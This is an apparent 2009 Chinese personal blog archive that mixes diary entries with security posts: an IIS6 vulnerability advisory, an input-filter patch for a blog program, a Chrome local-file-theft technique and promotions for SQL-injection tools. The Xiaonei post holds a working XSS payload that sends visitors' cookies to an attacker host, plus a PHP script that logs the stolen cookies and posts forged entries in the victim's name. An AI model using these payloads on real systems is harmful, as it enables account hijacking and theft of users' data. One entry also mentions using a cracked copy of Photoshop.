function Copyright()
{

var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;
return Reference;

}

/*

漏洞描述:

IIS6 (Internet Infomation Server 6.0) 是微软出品的一款WEB服务器系统, 广泛用于各种个人/商业信息发布/网站架设领域。80sec在测试中发现, IIS设计上在处理畸形文件名的时候存在一个严重的安全漏洞, 可能绕过web程序的逻辑检查从而能导致服务器以IIS进程权限执行任意恶意用户定义的脚本, 黑客可以通过制造畸形的服务器文件来触发该 漏洞, 并从而控制服务器.

漏洞厂商:

Microsoft [ http://www.microsoft.com ]

漏洞测试:

Undefined

解决方案:

等待微软更新官方补丁.

四月 26th, 2009

Posted In: 未分类

漏洞原因
[code]strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")[/code]
增加 Checkxss()重要函数。

代码安全由 安全小组 测试通过。

升级包请下载后直接覆盖

'==============================================
'补丁修改方法
'==============================================
Action.asp
request("cname") 改成 Checkxss(request.QueryString("cname"))
request("mainurl") 改成 Checkxss(request.QueryString("mainurl"))
request("main") 改成 Checkxss(request.QueryString("main"))

common/function.asp中增加函数
[code]'*************************************
'防XSS注入函数 更新于2009-04-21 by evio
'与checkstr()相比, checkxss更加安全
'*************************************
Function Checkxss(byVal ChkStr)
Dim Str
Str = ChkStr
If IsNull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str, "&", "&")
Str = Replace(Str, "'", "´")
Str = Replace(Str, """", """)
Str = Replace(Str, "<", "&lt;") Str = Replace(Str, ">", "&gt;")
Str = Replace(Str, "/", "&#47;")
Str = Replace(Str, "*", "&#42;")
Dim re
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
re.Pattern = "(w)(here)"
Str = re.Replace(Str, "$1here")
re.Pattern = "(s)(elect)"
Str = re.Replace(Str, "$1elect")
re.Pattern = "(i)(nsert)"
Str = re.Replace(Str, "$1nsert")
re.Pattern = "(c)(reate)"
Str = re.Replace(Str, "$1reate")
re.Pattern = "(d)(rop)"
Str = re.Replace(Str, "$1rop")
re.Pattern = "(a)(lter)"
Str = re.Replace(Str, "$1lter")
re.Pattern = "(d)(elete)"
Str = re.Replace(Str, "$1elete")
re.Pattern = "(u)(pdate)"
Str = re.Replace(Str, "$1pdate")
re.Pattern = "(s)(or)"
Str = re.Replace(Str, "$1or")
re.Pattern = "(n)"
Str = re.Replace(Str, "$1or")
'———————————-
re.Pattern = "(java)(script)"
Str = re.Replace(Str, "$1script")
re.Pattern = "(j)(script)"
Str = re.Replace(Str, "$1script")
re.Pattern = "(vb)(script)"
Str = re.Replace(Str, "$1script")
'———————————-
If Instr(Str, "expression") > 0 Then
Str = Replace(Str, "expression", "e&shy;xpression", 1, -1, 0) '防止xss注入
End If
Set re = Nothing
Checkxss = Str
End Function
[/code]
class/cls_logAction.asp中找到
[code]
oldcname = request.form("oldcname")
oldcate = request.form("oldcate")
oldctype = request.form("oldtype")
[/code]
改为
[code]
oldcname = Checkxss(request.form("oldcname"))
oldcate = Checkxss(request.form("oldcate"))
oldctype = Checkxss(request.form("oldtype"))
[/code]
GetArticle.asp
blog_postFile = request("blog_postFile") 改成 blog_postFile = Cint(Checkxss(request.QueryString("blog_postFile")))
[/code]
需要补丁的请到官方下载

四月 23rd, 2009

Posted In: 未分类

google的浏览器Chrome1.0.154.53(目前最新),存在ajax读取本地文件漏洞。

利用该漏洞可以读取本地文本文件,并提交出来。

而Chrome的cookie默认保存在“C:Documents and SettingsadministratorLocal SettingsApplication DataGoogleChromeUser DataDefaultCookies”

Chrome的历史保存在"C:Documents and SettingsadministratorLocal SettingsApplication DataGoogleChromeUser DataDefaultHistory"

读取这个文件,然后提交,前提是文件在本地打开,但是如何欺骗用户在本地打开呢?

看代码:

[code]



[/code]
注意,本代码上传TXT之前,已经做了加密,为了保证文件的完整性,具体的解密,请看

http://cha88.cn/safe/glacierlk.php

选择shellcode解密

浏览器会自动下在这个html文件,保存为kxlzx.htm。

下载后,用户肯定会去看看下载了什么,打开htm(在本地)。

打开后,执行JS,把本地的cookie,history等(可自定义),上传到恶意用户制定地方。

POC可以根据实际情况改进。有以下几点注意:

几点说明:
1,不一定非要读取cookie,你也可以读取其他东西,比如ftp软件的ini配置文件等,只要是txt就能读取。
2,读取cookie必须预测本地用户名,不过很多人都是administrator。
3,反正ajax是异步,你可以同时调用几个方法。
4,或者你可以发送任何想要的本地TXT文件。

其实这个漏洞和我以前发的opera本地读取漏洞是一个道理的。

但是会比他严重一点,因为Chrome的cookie文件地址是固定的。

四月 23rd, 2009

Posted In: 未分类

昨天约了公司几个MM一块去颐和园,当然玩的也蛮高兴,我也是第一次去,才发现还不是一般的大,照片是没少拍,可惜的就是鬼天气,没有太阳,让人郁闷的不行,下次在去别的地方摄影,我看要提前查一个星期的天气预报,这里就贴两名模特的PP吧

四月 19th, 2009

Posted In: 未分类

Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。

所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞,从而达到获取、修改、删除数据,甚至控制数据库服务器、Web服务器的目的的测试方法。Pangolin能够通过一系列非常简单的操作,达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。

过去有许多Sql注入工具,不过有些功能不完全,支持的数据库不够多,或者是速度比较慢。但是,在Pangolin发布以后,这些问题都得到了解决。Pangolin也许是目前已有的注入工具中最好的之一。

很多情况下是不是由于对方部署了防火墙而无法注入呢?过滤了关键字,过滤了特定的符号,难道我们就没有办法面对这些超级变态的防火墙配置吗?

从Pangolin v2.0.2.810版本开始,标准版及其以上版本支持一个高级选项“Enable BT Model(bypass firewall)”,测试人员可以选中该选项来绕过某些防火墙的过滤。当然,除非用户已知道某些情况相当变态(该模式对IIS尤其有效,对其他服务器效果不大),在默认情况下不推荐启用该模式。
download.asp?id=9

四月 17th, 2009

Posted In: 未分类


JSky为何物?
JSky是一款基于GUI界面的、运行在Windows平台下的、完全免费的自动化Web应用漏洞扫描软件。 ; )

JSky能够做什么?
JSky支持非常多的Web漏洞扫描,基本上所有商用化的漏洞扫描软件支持的JSky都支持,最常见的包括如下一些漏洞:

SQL注入(SQL Injection )
跨站脚本(XSS )
不安全的对象引用(Unsecure object using )
本地路径泄露(Local path disclosure )
不安全的目录权限(Unsecure directory permissions )
服务器漏洞如缓冲区溢出和配置错误(Server vulnerabilities like buffer overflow and configure error)
敏感目录和文件扫描(Possible sensitive directories and files scan )
备份文件扫描(Backup files scan )
源代码泄露(Source code disclosure )
命令执行(Command Execute )
文件包含(File Include )
Web木马后门(Web backdoor )
敏感信息(Sensitive information )
等等……

事实上,JSky不仅仅只是一款漏洞扫描软件,他更是一款功能超强的渗透测试利用工具。; )

为什么我应该使用JSky?
Look at these features and benefits, I think you will love it right away:

Powerful web spider that multi-threaded scanner crawls hundreds of thousands of pages with ease, also supports extract links from JavaScript and flash.
Advanced and in-depth SQL injection, you maybe had heard about Pangolin. Yes, I use its engine so it can detect these vulnerabilities exactly. Do not like others which using method of Pattern Matching. Databases include oracle, MSSQL, Mysql, Informix, DB2, Access, Sqlite, Sybase, PostgreSQL and some others.
Modularization design of vulnerability scanner, so everybody can code and share their module.
XML-based vulnerability file, and integrated a Web vulnerability executive parser which means you can design a vulnerability just by editing the XML file, no need to code any program.
It’s totally FREE.
谁应该使用JSky?
如下一些人员可能对JSky会比较感兴趣:

渗透测试人员
网站管理员
安全技术爱好者
甚至是……黑客?

四月 17th, 2009

Posted In: 未分类

上周装上个photoshop,然后找了一个破解方法,不得不佩服那些搞破解的兄弟,只能说声哥们辛苦了,安装上以后发现界面有了很大的变化,新增了3D功能,这个功能比较渲,呵,感受了一把,非常的不错,新增了几个功能,是不是真那么实用还要看效果,有些快捷键进行了组合,不过还不错,给人很亲切的感觉,在本人的影响下,办公室又加入3人体验,哈,看来大家对photoshop观注度都挺高的吗,自己先项了

四月 14th, 2009

Posted In: 未分类

校内网在发blog时对插入图片过滤不严格,存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发:

[code]

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

[/code]

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

[code]

<?php
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."rnrn";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志,这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";

fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1rn");
fwrite($sock, "Accept: */*rn");
fwrite($sock, "Referer: http://$urlrn");
fwrite($sock, "Accept-Language: zh-cnrn");
fwrite($sock, "Content-Type: application/x-www-form-urlencodedrn");
fwrite($sock, "Accept-Encoding: gzip, deflatern");
fwrite($sock, "User-Agent: Mozillarn");
fwrite($sock, "Host: $urlrn");
fwrite($sock, "Content-Length: ".strlen($data)."rn");
fwrite($sock, "Connection: Keep-Alivern");
fwrite($sock, "Cache-Control: no-cachern");
fwrite($sock, "Cookie:".$cookie."rnrn");
fwrite($sock, $data);
[/code]

四月 13th, 2009

Posted In: 未分类

两年前的今天,偶离开了熟悉的学校,一个人踏上了南下的列车,为了证实自己,也为了去实现一个承诺,两年后的今天,在一次实现了我另一个承诺,呵,别人常说,不要轻易向别人承诺,不过我常说,即然承诺了就要做到,做不到就不要给任何的承诺,承诺就像挑着一个担子,份量还是不轻的,四年实现两个诺言,呵,感觉并不是别人说的那么难,关键是自己好何去控制,如何来调节自己,哎~~~,手头上的工作还没做完,继续工作。。。。。

四月 10th, 2009

Posted In: 未分类


等了好久的樱花节总算到了,可是一直忙与工作都没有时间去看花,这周找了个时间去看了下画,也叫了名模特,呵,玩的还蛮开心,然后又去中央电视塔去登高望远,看了下北京全景,用了超级望远镜,原来在上面连下面人的表情都能看到,想着就有点后怕,有这东西人的隐私就太少了,现在这社会,这些高科技呀,哈,闲下来把照片发上来,呵,连美女的也一块

查多的照片请查看相册

四月 5th, 2009

Posted In: 未分类

好久没有在更新BLOG的程序,前几天看到有一些PJ的爱好者将PJ升级,不过程序有问题,后来还是偶慢慢恢复数据才可以,今天在次对插件升级了下,就发个图来测试下效果,好像功能还不错,呵

四月 3rd, 2009

Posted In: 未分类

无觅相关文章插件,快速提升流量